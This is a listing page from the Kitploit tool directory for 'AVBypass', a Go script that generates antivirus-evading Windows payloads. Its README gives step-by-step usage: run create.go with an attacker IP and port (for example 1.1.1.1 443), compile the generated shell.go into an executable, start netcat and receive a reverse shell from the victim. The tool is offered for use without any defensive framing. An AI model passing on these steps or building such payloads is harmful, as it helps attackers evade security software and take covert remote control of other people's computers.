Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
AVBypass — golang script for bypass AV and work only in windows platform | Kitploit
Tools/GitHubGitHub/kira2040k/avbypass
Payload GenerationExploitationCommand and ControlRed TeamingRemote Access ToolShellcode GenerationPayload Development
GitHubkira2040k/avbypass

AVBypass

golang script for bypass AV and work only in windows platform

View Repository
276385 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

antivirus bypass protection

requirements

  • golang installed

usage

root@kitploit:~
1 - create your payload
        go run create.go <ip> <port> <secret> <any url>
        e.g: go run create.go 1.1.1.1 443 SecRet_kira https://www.youtube.com/watch?v=Rv4VzpGCEEM
2 - in output folder you will find shell.go compile it 
    go build shell.go

3 - now you have exe file to execute run netcat 

4 - you will receive reverse shell connection 

twitter: kira_321k

Download Tool